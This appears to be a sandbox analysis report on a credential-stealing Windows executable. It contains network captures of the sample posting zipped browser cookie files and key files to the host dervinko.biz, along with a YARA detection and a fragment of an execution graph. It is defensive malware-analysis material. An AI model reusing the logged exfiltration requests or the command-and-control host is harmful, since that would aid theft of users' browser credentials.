alt-svc: h3=":443"; ma=86400
2024-05-06 13:19:56 UTC | 1369 | IN | Data Raw: 33 37 63 65 0d 0a 51 7a 38 53 45 52 5a 62 46 51 67 54 57 7a 49 56 45 68 45 55 51 6a 30 53 45 79 41 59 46 52 49 54 57 68 73 4e 45 68 46 69 5a 47 6c 52 43 52 59 56 50 52 49 54 49 42 67 56 45 68 4e 45 47 77 30 53 45 56 78 6b 65 56 31 53 56 56 56 72 62 6e 52 76 56 31 4a 65 56 47 68 6c 64 46 70 42 62 31 56 51 62 6d 31 68 53 6c 4a 41 45 30 52 5a 51 56 4d 54 47 44 4d 58 45 68 4d 67 47 42 55 51 52 52 59 44 46 77 4d 66 43 68 67 56 45 68 45 55 47 52 56 43 58 53 49 43 46 52 42 53 58 45 74 59 58 31 59 75 58 55 31 58 45 7a 34 5a 46 78 49 54 66 52 51 2f 45 68 45 55 47 55 77 34 45 79 41 59 46 52 49 52 46 6c 63 56 43 42 4d 69 57 6d 6c 75 55 67 77 62 47 7a 67 54 49 42 67 56 45 68 45 57 53 52 55 49 45 79 4a 6b 61 58 35 65 56 31 68 62 62 6d 39 48 56 31 70 56 58 56 46 6c 61
Data Ascii: 37ceQz8SERZbFQgTWzIVEhEUQj0SEyAYFRITWhsNEhFiZGlRCRYVPRITIBgVEhNEGw0SEVxkeV1SVVVrbnRvV1JeVGhldFpBb1VQbm1hSlJAE0RZQVMTGDMXEhMgGBUQRRYDFwMfChgVEhEUGRVCXSICFRBSXEtYX1YuXU1XEz4ZFxITfRQ/EhEUGUw4EyAYFRIRFlcVCBMiWmluUgwbGzgTIBgVEhEWSRUIEyJkaX5eV1hbbm9HV1pVXVFla
2024-05-06 13:19:56 UTC | 1369 | IN | Data Raw: 51 43 78 51 62 56 57 35 76 59 77 6f 44 45 42 30 2b 47 52 63 53 45 79 41 59 46 30 49 54 44 68 6b 56 62 6d 39 4d 56 31 5a 54 58 57 68 6c 42 41 51 44 51 6b 70 61 52 55 4a 52 53 32 74 75 63 58 4a 58 51 6b 46 55 52 6d 56 72 5a 30 42 6c 53 68 56 32 55 45 42 59 46 52 34 35 49 42 67 56 45 68 45 55 47 30 4d 51 43 53 41 4a 47 54 67 52 46 42 6b 58 45 68 4d 69 53 46 73 51 43 78 51 62 56 55 42 63 64 30 74 51 51 41 49 43 43 52 6c 58 53 32 55 61 50 78 49 52 46 42 6c 4b 48 6a 6b 67 47 42 55 53 53 6a 34 5a 46 78 49 54 49 42 67 58 58 42 4d 4f 47 52 56 51 62 31 78 62 42 41 73 54 47 44 4d 58 45 68 4d 67 47 42 55 51 51 52 59 44 46 78 42 76 58 48 52 61 55 56 42 59 5a 57 74 78 58 47 4e 37 57 6c 46 74 61 48 74 46 58 55 52 7a 58 55 64 75 62 57 46 4b 55 6b 41 54 52 46 6c 42 55 78
Data Ascii: QCxQbVW5vYwoDEB0+GRcSEyAYF0ITDhkVbm9MV1ZTXWhlBAQDQkpaRUJRS2tucXJXQkFURmVrZ0BlShV2UEBYFR45IBgVEhEUG0MQCSAJGTgRFBkXEhMiSFsQCxQbVUBcd0tQQAICCRlXS2UaPxIRFBlKHjkgGBUSSj4ZFxITIBgXXBMOGRVQb1xbBAsTGDMXEhMgGBUQQRYDFxBvXHRaUVBYZWtxXGN7WlFtaHtFXURzXUdubWFKUkATRFlBUx
2024-05-06 13:19:56 UTC | 1369 | IN | Data Raw: 49 6b 68 62 45 41 73 55 47 31 78 64 58 6d 56 4d 56 42 78 55 54 46 77 56 4f 42 4d 67 47 42 56 50 48 54 34 5a 46 78 49 54 65 7a 49 56 45 68 45 55 47 52 63 51 58 53 49 43 46 52 42 54 61 47 56 55 41 51 41 69 46 44 38 53 45 52 51 5a 46 78 49 52 63 42 6f 50 45 68 4e 6f 5a 58 74 64 55 47 46 55 61 57 35 6b 52 6c 68 5a 62 6d 39 56 53 31 42 41 45 58 42 59 51 31 4d 52 4c 44 49 56 45 68 45 55 47 52 63 51 52 79 49 43 46 51 4d 64 50 68 6b 58 45 68 4d 67 47 42 64 43 58 78 59 44 46 78 42 47 63 6c 6c 62 48 46 52 4d 58 42 55 34 45 79 41 59 46 55 38 64 50 68 6b 58 45 68 4e 37 4d 68 55 53 45 52 51 5a 46 78 42 64 49 67 49 56 45 46 4e 6f 5a 56 51 42 42 43 49 55 50 78 49 52 46 42 6b 58 45 68 46 77 47 67 38 53 45 32 68 6c 65 31 31 51 59 56 52 70 62 6c 31 64 58 46 56 54 58 46 78
Data Ascii: IkhbEAsUG1xdXmVMVBxUTFwVOBMgGBVPHT4ZFxITezIVEhEUGRcQXSICFRBTaGVUAQAiFD8SERQZFxIRcBoPEhNoZXtdUGFUaW5kRlhZbm9VS1BAEXBYQ1MRLDIVEhEUGRcQRyICFQMdPhkXEhMgGBdCXxYDFxBGcllbHFRMXBU4EyAYFU8dPhkXEhN7MhUSERQZFxBdIgIVEFNoZVQBBCIUPxIRFBkXEhFwGg8SE2hle11QYVRpbl1dXFVTXFx
2024-05-06 13:19:56 UTC | 1369 | IN | Data Raw: 68 64 77 51 57 39 50 52 6c 64 44 61 47 56 69 51 56 5a 79 47 48 46 54 52 56 55 62 47 7a 67 54 49 42 67 56 45 68 45 57 54 52 55 49 45 7a 45 55 50 78 49 52 46 42 6b 58 45 68 46 77 56 68 63 49 45 52 5a 38 57 31 64 65 5a 56 5a 42 51 58 4e 47 56 6b 42 42 56 6e 49 57 55 45 70 55 46 6a 4d 58 45 68 4d 67 52 52 6b 34 45 52 51 5a 46 30 6b 35 49 42 67 56 45 68 45 55 47 31 6b 51 43 53 41 61 56 32 35 74 56 77 73 41 45 42 38 4b 47 42 55 53 45 52 51 5a 46 55 49 52 4f 68 67 58 62 6d 31 34 56 6c 52 54 58 31 78 6b 65 46 4e 42 57 46 78 6b 52 6b 5a 6b 55 56 70 75 62 58 64 52 52 56 31 65 5a 57 68 5a 52 30 4a 6f 5a 57 4a 42 56 6e 49 59 63 56 4e 46 56 52 73 62 4f 42 4d 67 47 42 55 53 45 52 5a 4e 46 51 67 54 4d 52 51 2f 45 68 45 55 47 52 63 53 45 58 42 57 46 77 67 52 46 6e 70 66
Data Ascii: hdwQW9PRldDaGViQVZyGHFTRVUbGzgTIBgVEhEWTRUIEzEUPxIRFBkXEhFwVhcIERZ8W1deZVZBQXNGVkBBVnIWUEpUFjMXEhMgRRk4ERQZF0k5IBgVEhEUG1kQCSAaV25tVwsAEB8KGBUSERQZFUIROhgXbm14VlRTX1xkeFNBWFxkRkZkUVpubXdRRV1eZWhZR0JoZWJBVnIYcVNFVRsbOBMgGBUSERZNFQgTMRQ/EhEUGRcSEXBWFwgRFnpf
2024-05-06 13:19:56 UTC | 1369 | IN | Data Raw: 42 51 46 48 64 53 58 56 31 63 5a 47 42 42 56 45 59 5a 63 31 4e 48 59 52 6f 5a 4f 42 45 55 47 52 63 53 45 79 4a 4d 46 77 67 52 42 52 55 39 45 68 4d 67 47 42 55 53 45 30 52 58 46 51 67 54 49 6c 64 46 56 30 4e 56 46 31 4a 4b 56 69 49 79 46 52 49 52 46 45 51 62 4f 42 4d 67 47 42 56 4a 4f 78 51 5a 46 78 49 54 49 42 70 62 45 41 73 55 47 31 56 75 62 32 63 4a 46 78 34 37 46 42 6b 58 45 68 4d 67 47 6b 55 51 43 78 51 62 61 32 35 68 62 31 6c 59 57 31 39 54 5a 57 74 2f 58 48 70 52 57 56 35 51 61 47 56 78 57 30 46 6c 58 6c 70 4b 62 57 68 70 52 56 31 56 61 56 52 51 51 52 4d 59 4d 78 63 53 45 79 41 59 46 52 42 46 46 67 4d 58 41 42 38 4b 47 42 55 53 45 52 51 5a 46 55 4a 64 49 67 49 56 45 46 64 64 53 31 4a 55 58 48 67 57 55 45 70 55 46 6a 4d 58 45 68 4d 67 52 52 6b 34 45
Data Ascii: BQFHdSXV1cZGBBVEYZc1NHYRoZOBEUGRcSEyJMFwgRBRU9EhMgGBUSE0RXFQgTIldFV0NVF1JKViIyFRIRFEQbOBMgGBVJOxQZFxITIBpbEAsUG1Vub2cJFx47FBkXEhMgGkUQCxQba25hb1lYW19TZWt/XHpRWV5QaGVxW0FlXlpKbWhpRV1VaVRQQRMYMxcSEyAYFRBFFgMXAB8KGBUSERQZFUJdIgIVEFddS1JUXHgWUEpUFjMXEhMgRRk4E
2024-05-06 13:19:56 UTC | 1369 | IN | Data Raw: 69 56 68 63 49 45 52 5a 4f 42 52 41 35 49 42 67 56 45 6b 77 59 4d 78 63 53 45 79 42 44 50 78 49 52 46 42 6b 58 45 68 46 70 58 42 63 49 45 52 5a 66 58 31 42 63 61 46 46 59 55 31 52 59 57 31 68 61 51 32 70 61 56 31 35 56 56 31 64 51 55 56 31 68 53 46 74 57 58 6c 42 54 52 78 41 66 43 68 67 56 45 68 45 55 47 52 56 63 45 54 6f 59 46 30 55 43 46 6a 4d 58 45 68 4d 67 52 52 6b 34 45 52 51 5a 46 30 6b 35 49 42 67 56 45 68 45 55 47 31 35 57 45 54 6f 59 46 31 46 66 57 56 68 61 55 31 4a 6a 55 45 56 43 58 31 39 54 55 46 78 61 62 46 78 46 56 6c 78 66 57 46 5a 5a 56 6d 70 57 58 56 4e 55 46 68 55 39 45 68 4d 67 47 42 55 53 45 31 6f 62 44 52 49 52 64 77 41 58 4f 42 45 55 47 52 64 50 48 77 6f 59 46 52 49 52 54 7a 4d 58 45 68 4d 67 47 42 55 51 57 46 41 62 44 52 49 52 62 6c
Data Ascii: iVhcIERZOBRA5IBgVEkwYMxcSEyBDPxIRFBkXEhFpXBcIERZfX1BcaFFYU1RYW1haQ2paV15VV1dQUV1hSFtWXlBTRxAfChgVEhEUGRVcEToYF0UCFjMXEhMgRRk4ERQZF0k5IBgVEhEUG15WEToYF1FfWVhaU1JjUEVCX19TUFxabFxFVlxfWFZZVmpWXVNUFhU9EhMgGBUSE1obDRIRdwAXOBEUGRdPHwoYFRIRTzMXEhMgGBUQWFAbDRIRbl
2024-05-06 13:19:56 UTC | 1369 | IN | Data Raw: 50 52 49 54 49 42 68 4f 4f 42 45 55 47 52 63 53 45 79 4a 52 55 52 41 4c 46 42 74 5a 57 56 46 70 55 46 4e 51 56 46 74 65 56 6c 64 53 62 31 31 64 58 6c 52 53 56 31 78 64 56 32 4a 64 55 31 56 42 55 31 4a 5a 58 42 45 73 4d 68 55 53 45 52 51 5a 46 78 42 64 49 67 49 56 45 45 59 47 43 68 55 34 45 79 41 59 46 55 38 64 50 68 6b 58 45 68 4e 37 4d 68 55 53 45 52 51 5a 46 78 42 61 5a 42 6f 50 45 68 4e 56 55 46 35 55 55 57 35 61 55 31 31 54 52 46 52 53 56 31 68 70 53 46 31 58 56 46 31 54 58 6c 39 58 63 46 5a 5a 51 6c 5a 45 53 52 55 65 4f 53 41 59 46 52 49 52 46 42 74 5a 45 41 6b 67 47 6b 49 41 42 52 59 7a 46 78 49 54 49 45 55 5a 4f 42 45 55 47 52 64 4a 4f 53 41 59 46 52 49 52 46 42 74 65 56 68 45 36 47 42 64 54 56 46 56 61 58 31 6c 64 62 56 31 54 51 6c 6c 52 53 56 52
Data Ascii: PRITIBhOOBEUGRcSEyJRURALFBtZWVFpUFNQVFteVldSb11dXlRSV1xdV2JdU1VBU1JZXBEsMhUSERQZFxBdIgIVEEYGChU4EyAYFU8dPhkXEhN7MhUSERQZFxBaZBoPEhNVUF5UUW5aU11TRFRSV1hpSF1XVF1TXl9XcFZZQlZESRUeOSAYFRIRFBtZEAkgGkIABRYzFxITIEUZOBEUGRdJOSAYFRIRFBteVhE6GBdTVFVaX1ldbV1TQllRSVR
2024-05-06 13:19:56 UTC | 1369 | IN | Data Raw: 68 4e 64 58 52 55 49 45 79 4a 51 57 31 52 51 57 6c 4a 5a 58 56 42 6d 58 56 70 55 55 31 42 64 55 46 46 61 61 6c 5a 59 57 6c 39 53 56 31 78 57 58 57 46 5a 55 52 41 64 50 68 6b 58 45 68 4d 67 47 42 64 63 45 77 34 5a 46 55 55 41 4d 78 6f 2f 45 68 45 55 47 55 6f 65 4f 53 41 59 46 52 4a 4b 50 68 6b 58 45 68 4d 67 47 42 64 62 56 52 59 44 46 78 42 51 61 56 42 59 58 56 42 51 57 46 35 56 57 32 4e 64 58 31 31 42 56 56 52 61 56 46 46 74 58 46 46 52 58 46 42 63 58 46 46 5a 5a 52 6f 5a 4f 42 45 55 47 52 63 53 45 79 4a 57 46 77 67 52 46 6b 34 45 42 68 45 4b 47 42 55 53 45 55 6b 56 50 52 49 54 49 42 68 4f 4f 42 45 55 47 52 63 53 45 79 4a 52 55 52 41 4c 46 42 74 56 56 46 31 68 58 56 6c 66 58 6c 6c 63 58 6c 39 62 62 45 68 59 56 56 74 61 55 31 68 43 57 32 68 49 58 6c 6c 65
Data Ascii: hNdXRUIEyJQW1RQWlJZXVBmXVpUU1BdUFFaalZYWl9SV1xWXWFZURAdPhkXEhMgGBdcEw4ZFUUAMxo/EhEUGUoeOSAYFRJKPhkXEhMgGBdbVRYDFxBQaVBYXVBQWF5VW2NdX11BVVRaVFFtXFFRXFBcXFFZZRoZOBEUGRcSEyJWFwgRFk4EBhEKGBUSEUkVPRITIBhOOBEUGRcSEyJRURALFBtVVF1hXVlfXllcXl9bbEhYVVtaU1hCW2hIXlle
2024-05-06 13:19:56 UTC | 1369 | IN | Data Raw: 6c 64 58 31 56 58 57 56 52 66 58 46 74 69 57 31 52 55 58 46 70 63 55 56 42 61 61 6c 70 5a 57 31 39 53 58 78 55 65 4f 53 41 59 46 52 49 52 46 42 74 5a 45 41 6b 67 47 6b 49 47 42 68 59 7a 46 78 49 54 49 45 55 5a 4f 42 45 55 47 52 64 4a 4f 53 41 59 46 52 49 52 46 42 74 65 56 68 45 36 47 42 64 58 56 6c 42 64 55 31 68 52 61 6c 52 57 57 46 4a 66 55 46 4a 59 55 57 4a 5a 57 31 64 65 56 6c 4a 48 56 56 31 74 53 46 35 63 51 52 59 56 50 52 49 54 49 42 67 56 45 68 4e 61 47 77 30 53 45 58 63 4d 44 52 41 37 46 42 6b 58 45 6b 34 73 4d 68 55 53 45 52 52 43 50 52 49 54 49 42 67 56 45 68 4e 64 58 52 55 49 45 79 4a 57 58 46 70 64 55 56 74 54 58 6c 42 6a 55 6c 39 57 56 46 35 65 57 46 46 44 62 31 39 54 51 6c 6c 52 57 46 78 5a 51 32 39 63 56 78 41 64 50 68 6b 58 45 68 4d 67 47
Data Ascii: ldX1VXWVRfXFtiW1RUXFpcUVBaalpZW19SXxUeOSAYFRIRFBtZEAkgGkIGBhYzFxITIEUZOBEUGRdJOSAYFRIRFBteVhE6GBdXVlBdU1hRalRWWFJfUFJYUWJZW1deVlJHVV1tSF5cQRYVPRITIBgVEhNaGw0SEXcMDRA7FBkXEk4sMhUSERRCPRITIBgVEhNdXRUIEyJWXFpdUVtTXlBjUl9WVF5eWFFDb19TQllRWFxZQ29cVxAdPhkXEhMgG
2024-05-06 13:19:56 UTC | 1369 | IN | Data Raw: 61 57 6c 4a 70 58 31 39 63 57 6c 74 62 57 56 78 61 61 42 6f 5a 4f 42 45 55 47 52 63 53 45 79 4a 57 46 77 67 52 46 6b 34 42 41 68 45 4b 47 42 55 53 45 55 6b 56 50 52 49 54 49 42 68 4f 4f 42 45 55 47 52 63 53 45 79 4a 52 55 52 41 4c 46 42 74 48 58 46 39 6a 57 31 68 64 57 31 64 55 55 6c 31 62 62 45 68 53 56 56 78 53 56 31 56 51 57 6d 46 49 58 6c 39 54 57 46 42 59 55 42 45 73 4d 68 55 53 45 52 51 5a 46 78 42 64 49 67 49 56 45 45 45 43 43 42 55 34 45 79 41 59 46 55 38 64 50 68 6b 58 45 68 4e 37 4d 68 55 53 45 52 51 5a 46 78 42 61 5a 42 6f 50 45 68 4e 59 55 31 46 43 55 47 6c 65 52 56 56 54 56 6c 70 66 58 56 64 6b 53 46 39 58 56 31 56 51 52 31 31 61 61 56 39 46 56 6c 78 56 58 68 55 65 4f 53 41 59 46 52 49 52 46 42 74 5a 45 41 6b 67 47 6b 55 45 41 78 59 7a 46 78
Data Ascii: aWlJpX19cWltbWVxaaBoZOBEUGRcSEyJWFwgRFk4BAhEKGBUSEUkVPRITIBhOOBEUGRcSEyJRURALFBtHXF9jW1hdW1dUUl1bbEhSVVxSV1VQWmFIXl9TWFBYUBEsMhUSERQZFxBdIgIVEEECCBU4EyAYFU8dPhkXEhN7MhUSERQZFxBaZBoPEhNYU1FCUGleRVVTVlpfXVdkSF9XV1VQR11aaV9FVlxVXhUeOSAYFRIRFBtZEAkgGkUEAxYzFx


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49701 | 104.21.13.203 | 443 | 6256 | C:\Users\user\Desktop\Gj8P0mbklo.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-06 13:19:57 UTC | 165 | OUT | POST /Up HTTP/1.1
Content-Type: application/octet-stream; boundary=----
User-Agent: MyApp/1.0
Host: dervinko.biz
Content-Length: 341
Cache-Control: no-cache
2024-05-06 13:19:57 UTC | 329 | OUT | Data Raw: 50 4b 03 04 14 00 08 08 08 00 7c 7a a6 58 00 00 00 00 00 00 00 00 00 00 00 00 28 00 04 00 38 39 37 33 37 62 35 37 2d 37 37 37 64 2d 34 30 30 64 2d 62 62 37 66 2d 37 37 62 37 65 30 32 34 39 32 30 65 2e 74 78 74 01 00 00 00 7d 8d b1 0a 02 31 10 44 7f 25 4c 9d 62 37 e4 a2 6e 29 b6 36 36 16 62 71 e4 a2 04 e4 22 1b d1 03 f1 df 5d 7f c0 72 de 3c 66 de 18 21 58 52 84 47 86 04 8f 2b e4 84 7d cd da 7a bb 3c dc 76 ec 35 bb 43 99 a7 a2 6e a7 f5 59 d4 d4 ff fd d9 e3 06 e1 15 0f 44 89 37 83 47 b3 93 63 9d a7 f6 ea 8e c9 06 ee 06 02 27 8a 6c 41 21 91 7e 5a 37 ca 61 4d 0b 53 88 f8 7c 01 50 4b 07 08 38 0e 72 85 77 00 00 00 00 00 00 00 9d 00 00 00 00 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 7c 7a a6 58 38 0e 72 85 77 00 00 00 9d 00 00 00 28 00 04 00 00 00 00 00 00 00
Data Ascii: PK|zX(89737b57-777d-400d-bb7f-77b7e024920e.txt}1D%Lb7n)66bq"]r<f!XRG+}z<v5CnYD7Gc'lA!~Z7aMS|PK8rwPK|zX8rw(
2024-05-06 13:19:57 UTC | 12 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a
Data Ascii: --------
2024-05-06 13:19:57 UTC | 521 | IN | HTTP/1.1 200 OK
Date: Mon, 06 May 2024 13:19:57 GMT
Content-Length: 0
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9KQRHKt0FkrDTK4ekzPbhBR2CeVaX70i4tpMbFvCxJNXLTkfuYDt%2FbUrsb5Yh97z1gQptJ1L5wBSv9lWz0ayurpOOPWxJ%2BE7r%2FtWfCYNi0oiVblox4aFp69fToYYgwY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f943d0e8c8a4f2-MIA
alt-svc: h3=":443"; ma=86400


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.6  49702        104.21.13.203   443               6256  C:\Users\user\Desktop\Gj8P0mbklo.exe

Timestamp                Bytes transferred  Direction  Data
2024-05-06 13:19:59 UTC  168                OUT        POST /Up/b HTTP/1.1
  Content-Type: application/octet-stream; boundary=----
  User-Agent: MyApp/1.0
  Host: dervinko.biz
  Content-Length: 7753
  Cache-Control: no-cache
2024-05-06 13:19:59 UTC  7741               OUT        Data Raw: 50 4b 03 04 14 00 08 08 08 00 7d 7a a6 58 00 00 00 00 00 00 00 00 00 00 00 00 08 00 04 00 62 2f 63 38 2f 6b 65 79 01 00 00 00 01 20 00 df ff 0e b4 c5 60 bb 0c ed 85 60 10 de a9 0a ff d1 5d e6 fc 06 ae f8 f0 4c 07 6e c2 c2 20 6b f5 90 47 50 4b 07 08 63 48 45 8c 25 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 50 4b 03 04 14 00 08 08 08 00 7d 7a a6 58 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 00 62 2f 63 38 2f 30 2f 43 6f 6f 6b 69 65 73 31 01 00 00 00 ed d9 7f 6c 13 55 1c 00 f0 77 77 5b f7 8b ee 36 a5 4c 52 63 0e 86 ba 99 b1 3a 11 34 36 d1 75 50 b6 ba d2 6d a5 83 4d 34 e7 d1 be ad c7 da de ed ee dd 64 28 91 a1 89 33 33 c6 91 99 40 d4 a4 62 24 01 4d 46 1c 19 c9 16 13 06 0a ce 11 98 e8 44 fc 43 11 03 a8 21 64 26 68 f0 1f e2 bb ad 63 5d d7 c5 7f fc 63 7f 7c
  Data Ascii: PK}zXb/c8/key ``]Ln kGPKcHE% PK}zXb/c8/0/Cookies1lUww[6LRc:46uPmM4d(33@b$MFDC!d&hc]c|
2024-05-06 13:19:59 UTC  12                 OUT        Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a
  Data Ascii: --------
2024-05-06 13:19:59 UTC  519                IN         HTTP/1.1 200 OK
  Date: Mon, 06 May 2024 13:19:59 GMT
  Content-Length: 0
  Connection: close
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VAM5s3U5JIpgEpwie5z0QTau%2BM4GXhCZ9Yld4ZASHHMa44eUCGxtulBEzoVfDKyoPXG4IAe9d%2FjpK9d2VuWGgVIMtKumJdKulOfGt66vHigznY3SgOhmWFhcCntN8Fk%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 87f943db79b8287e-MIA
  alt-svc: h3=":443"; ma=86400


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.6  49703        104.21.13.203   443               6256  C:\Users\user\Desktop\Gj8P0mbklo.exe

Timestamp                Bytes transferred  Direction  Data
2024-05-06 13:20:01 UTC  169                OUT        POST /Up/b HTTP/1.1
  Content-Type: application/octet-stream; boundary=----
  User-Agent: MyApp/1.0
  Host: dervinko.biz
  Content-Length: 11660
  Cache-Control: no-cache
2024-05-06 13:20:01 UTC  11648              OUT        Data Raw: 50 4b 03 04 14 00 08 08 08 00 7d 7a a6 58 00 00 00 00 00 00 00 00 00 00 00 00 08 00 04 00 62 2f 63 39 2f 6b 65 79 01 00 00 00 01 20 00 df ff b3 b7 ef 54 5b af 12 0b 34 ad 96 8e 35 bc c1 b8 c3 80 8d 23 18 d3 f2 5b d7 55 38 9b f9 18 63 55 50 4b 07 08 0e 18 a7 1a 25 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 50 4b 03 04 14 00 08 08 08 00 7d 7a a6 58 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 00 62 2f 63 39 2f 30 2f 43 6f 6f 6b 69 65 73 31 01 00 00 00 ed d9 3d 6f d3 40 18 07 f0 73 9c 34 50 12 dc 0e 55 86 30 9c 5a 24 5a 29 bc 54 11 12 52 17 d2 d6 94 88 90 d0 90 a0 76 b2 ae ce b5 31 4d 6c f7 7c 2e cd d8 a1 03 4b 3f 01 5f 80 91 af c0 c6 04 1f 81 85 15 89 8d 11 5f 9a 36 a1 75 40 42 aa 84 aa ff 4f 72 62 df 73 39 bf e4 c9 29 7e fc 72 bd e2 48 4e b7 3d d1 65 92
  Data Ascii: PK}zXb/c9/key T[45#[U8cUPK% PK}zXb/c9/0/Cookies1=o@s4PU0Z$Z)TRv1Ml|.K?__6u@BOrbs9)~rHN=e
2024-05-06 13:20:01 UTC  12                 OUT        Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a
  Data Ascii: --------
2024-05-06 13:20:01 UTC  521                IN         HTTP/1.1 200 OK
  Date: Mon, 06 May 2024 13:20:01 GMT
  Content-Length: 0
  Connection: close
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kjzaPr6UjOXZinlS3kIOX0AVNj3zG%2FpOYVpX9Aiu5yiKeWb9MWahhc3MqS5Ah7%2FLGr6BdPAzOGPlQiIFFROlqVgqrZwjzCeKIgwWeFF8t6dIlRx%2F4WzcVpAYuaYjcLE%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 87f943e739243340-MIA
  alt-svc: h3=":443"; ma=86400


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.6  49704        104.21.13.203   443               6256  C:\Users\user\Desktop\Gj8P0mbklo.exe

Timestamp                Bytes transferred  Direction  Data
2024-05-06 13:20:02 UTC  168                OUT        POST /Up/b HTTP/1.1
  Content-Type: application/octet-stream; boundary=----
  User-Agent: MyApp/1.0
  Host: dervinko.biz
  Content-Length: 9194
  Cache-Control: no-cache
2024-05-06 13:20:02 UTC  9182               OUT        Data Raw: 50 4b 03 04 14 00 08 08 08 00 80 7a a6 58 00 00 00 00 00 00 00 00 00 00 00 00 15 00 04 00 62 2f 67 31 2f 30 2f 63 6f 6f 6b 69 65 73 2e 73 71 6c 69 74 65 01 00 00 00 ed d2 4f 4f d4 40 14 00 f0 b2 18 35 46 cf 5e 27 e1 20 24 1b a3 31 de 5d b0 2a 71 01 d9 5d 12 39 91 b2 54 a9 2e 5b 68 bb 82 26 04 12 13 bf 97 df c0 6f c2 d5 a3 e5 af ab 12 ce 26 fc 7e c9 4c de cc 6b a6 af af d3 5d 6e 67 55 1a de e5 c5 56 52 85 27 d1 61 d4 68 44 cf 42 88 a2 68 f2 6c 9c 9b a8 c7 8d bf d6 77 a3 ab 4d 46 0f 3f fc b8 77 f0 33 6a ec 1f 45 fb 47 07 df 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 ff c3 d7 a5 89 5b f7 a7 a6 26 be a5 55 b2 3e 48 b7 f2 2f 6b fd 3c ff 98 a5 e5 58 d8 98 eb c4 ad 5e 1c 7a ad d9 76 1c c6 12 61 3a db 08 f3 8b
  Data Ascii: PKzXb/g1/0/cookies.sqliteOO@5F^' $1]*q]9T.[h&o&~Lk]ngUVR'ahDBhlwMF?w3jEG#[&U>H/k<X^zva:
2024-05-06 13:20:02 UTC  12                 OUT        Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a
  Data Ascii: --------
2024-05-06 13:20:03 UTC  525                IN         HTTP/1.1 200 OK
  Date: Mon, 06 May 2024 13:20:03 GMT
  Content-Length: 0
  Connection: close
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=emd7dqbvewEe7iwJU9f%2FLM3516Fhbq5EBbQpu8Z%2BO0wLZAlF9AfKcOEmWo3ZT3FKkMJfsj1h%2FIDm35BQuXCcGC07TRYTRDoSEZTGIkqEWhM%2FgT3tXyVEXuqmv8%2B5upM%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 87f943f2493da662-MIA
  alt-svc: h3=":443"; ma=86400



Target ID: 0
Start time: 15:19:53
Start date: 06/05/2024
Path: C:\Users\user\Desktop\Gj8P0mbklo.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Gj8P0mbklo.exe"
Imagebase: 0x350000
File size: 362'496 bytes
MD5 hash: BAD3FA5127EFCC9C678C5D71FCE0D0B2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 6.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 56.8%
Total number of Nodes: 2000
Total number of Limit Nodes: 33
[Execution graph: interactive node/edge rendering not reproduced. Entry nodes at 357a4e, 3648b3 and 36c490; Windows API calls appearing as graph nodes include GetFileAttributesA, lstrlenA, GetProcessHeap, HeapAlloc, HeapFree, CryptUnprotectData, GetNativeSystemInfo, KiUserCallbackDispatcher, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess and TerminateProcess.]
38324->38324 38325 356f10 96 API calls 38324->38325 38326 36b46c 38325->38326 38327 374a11 CatchGuardHandler 5 API calls 38326->38327 38328 36b492 38327->38328 38328->38131 38330 356f10 96 API calls 38329->38330 38331 36be8d 38330->38331 38332 35e940 41 API calls 38331->38332 38333 36be94 38332->38333 38334 36beb2 38333->38334 38335 36bfca 38333->38335 38337 356f10 96 API calls 38334->38337 38552 37b1dd 39 API calls __CreateFrameInfo 38335->38552 38339 36becb 38337->38339 38338 36bfcf 38340 380fd8 39 API calls 38338->38340 38341 374780 96 API calls 38339->38341 38342 36bfd4 38340->38342 38343 36bedc 38341->38343 38343->38338 38344 36bf08 error_info_injector 38343->38344 38345 356f10 96 API calls 38344->38345 38346 36bf49 38345->38346 38347 35e940 41 API calls 38346->38347 38348 36bf50 38347->38348 38349 374650 96 API calls 38348->38349 38350 36bf5e 38349->38350 38351 36bf93 38350->38351 38352 36bf78 NtQuerySystemInformation 38350->38352 38353 356f10 96 API calls 